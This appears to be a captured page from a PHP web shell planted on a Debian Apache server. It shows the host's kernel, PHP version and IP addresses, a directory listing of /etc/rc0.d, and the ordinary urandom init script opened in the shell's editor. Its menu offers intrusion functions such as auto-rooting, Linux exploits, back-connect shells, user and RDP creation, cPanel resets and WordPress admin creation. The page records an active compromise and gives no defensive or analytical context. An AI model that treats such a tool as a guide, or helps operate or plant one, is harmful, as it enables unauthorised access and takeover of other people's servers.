Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.144.37.178
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
rc0.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
K01apache2
7.99
KB
-rwxr-xr-x
K01atd
1.05
KB
-rwxr-xr-x
K01brightness
2.13
KB
-rwxr-xr-x
K01exim4
6.99
KB
-rwxr-xr-x
K01firewalld
2.25
KB
-rwxr-xr-x
K01irqbalance
2.39
KB
-rwxr-xr-x
K01netfilter-persistent
1.33
KB
-rwxr-xr-x
K01php5.6-fpm
4.19
KB
-rwxr-xr-x
K01php7.0-fpm
4.19
KB
-rwxr-xr-x
K01php7.2-fpm
4.19
KB
-rwxr-xr-x
K01php7.3-fpm
4.19
KB
-rwxr-xr-x
K01php7.4-fpm
4.19
KB
-rwxr-xr-x
K01php8.2-fpm
4.19
KB
-rwxr-xr-x
K01saned
2.17
KB
-rwxr-xr-x
K01udev
6.71
KB
-rwxr-xr-x
K01unattended-upgrades
1.36
KB
-rwxr-xr-x
K01urandom
3.04
KB
-rwxr-xr-x
K02mysql
6.06
KB
-rwxr-xr-x
K03sendsigs
3.13
KB
-rwxr-xr-x
K04rsyslog
2.8
KB
-rwxr-xr-x
K05umountnfs.sh
2.21
KB
-rwxr-xr-x
K06nfs-common
5.53
KB
-rwxr-xr-x
K06rpcbind
2.42
KB
-rwxr-xr-x
K07hwclock.sh
3.72
KB
-rwxr-xr-x
K07networking
4.34
KB
-rwxr-xr-x
K08umountfs
2.71
KB
-rwxr-xr-x
K09umountroot
1.21
KB
-rwxr-xr-x
K10halt
1.3
KB
-rwxr-xr-x
README
353
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : K01urandom
#! /bin/sh ### BEGIN INIT INFO # Provides: urandom # Required-Start: $local_fs $time # Required-Stop: $local_fs # Default-Start: S # Default-Stop: 0 6 # Short-Description: Save and restore random seed between restarts. # Description: This script saves the random seed between restarts. # It is called from the boot, halt and reboot scripts. ### END INIT INFO ## Assumption 1: We assume $SAVEDFILE is a file (or a symlink ## to a file) that resides on a non-volatile medium that persists ## across reboots. ## Case 1a: Ideally, it is readable and writeable. Its is unshared, ## i.e. its contents are unique to this machine. It is protected so ## that its contents are not known to attackers. ## Case 1b: Less than ideally, it is read-only. Its contents are ## unique to this machine and not known to attackers. SAVEDFILE=/var/lib/urandom/random-seed [ -c /dev/urandom ] || exit 0 PATH=/sbin:/bin if ! POOLBYTES=$(( ($(cat /proc/sys/kernel/random/poolsize 2>/dev/null) + 7) / 8 )) ; then POOLBYTES=512 fi . /lib/init/vars.sh . /lib/lsb/init-functions do_status () { if [ -f $SAVEDFILE ] ; then return 0 else return 4 fi } case "$1" in start|"") [ "$VERBOSE" = no ] || log_action_begin_msg "Initializing random number generator" # Seed the RNG with date and time. # This is helpful in the less-than-ideal case where $SAVEDFILE # is read-only. # The value of this is greatly reduced if $SAVEDFILE is missing, # or its contents are shared machine-to-machine or known to # attackers (since they might well know at what time this # machine booted up). ( date +%s.%N # Load and then save $POOLBYTES bytes, # which is the size of the entropy pool if [ -f "$SAVEDFILE" ] then cat "$SAVEDFILE" fi # Redirect output of subshell (not individual commands) # to cope with a misfeature in the FreeBSD (not Linux) # /dev/random, where every superuser write/close causes # an explicit reseed of the yarrow. ) >/dev/urandom # Write a new seed into $SAVEDFILE because re-using a seed # compromises security. Each time we re-seed, we want the # seed to be as different as possible. # Write it now, in case the machine crashes without doing # an orderly shutdown. # The write will fail if $SAVEDFILE is read-only, but it # doesn't hurt to try. umask 077 dd if=/dev/urandom of=$SAVEDFILE bs=$POOLBYTES count=1 >/dev/null 2>&1 ES=$? umask 022 [ "$VERBOSE" = no ] || log_action_end_msg $ES ;; stop) # Carry a random seed from shut-down to start-up; # Write it on shutdown, in case the one written at startup # has been lost, snooped, or otherwise compromised. # see documentation in linux/drivers/char/random.c [ "$VERBOSE" = no ] || log_action_begin_msg "Saving random seed" umask 077 dd if=/dev/urandom of=$SAVEDFILE bs=$POOLBYTES count=1 >/dev/null 2>&1 ES=$? [ "$VERBOSE" = no ] || log_action_end_msg $ES ;; status) do_status exit $? ;; restart|reload|force-reload) echo "Error: argument '$1' not supported" >&2 exit 3 ;; *) echo "Usage: urandom start|stop" >&2 exit 3 ;; esac :
Close